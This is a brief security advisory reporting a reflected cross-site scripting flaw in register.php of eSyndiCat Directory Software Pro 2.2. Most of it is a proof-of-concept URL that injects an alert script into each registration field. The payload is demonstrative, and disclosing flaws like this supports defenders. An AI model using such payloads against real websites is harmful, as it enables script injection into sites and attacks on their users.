eSyndiCat Directory Software pro version 2.2 suffers from a cross site scripting vulnerability.
f881675b70863cd64401fa61f03215e63cf2f16425ad50667adb77dab6397321
eSyndiCat Directory Software Pro 2.2 XSS - Cross-Site Scripting Vulnerability
- Vendor : www.esyndicat.com
- Platform : PHP
- Discovered : by Fugitif
My vulnerability is on "register.php" and works this way :
https://www.site.com/register.php where username="><script>alert(12157312.477)</script>&email="><script>alert(12157312.477)</script>&password="><script>alert(12157312.477)</script>&password2="><script>alert(12157312.477)</script>&security_code="><script>alert(12157312.477)</script>®ister="><script>alert(12157312.477)</script>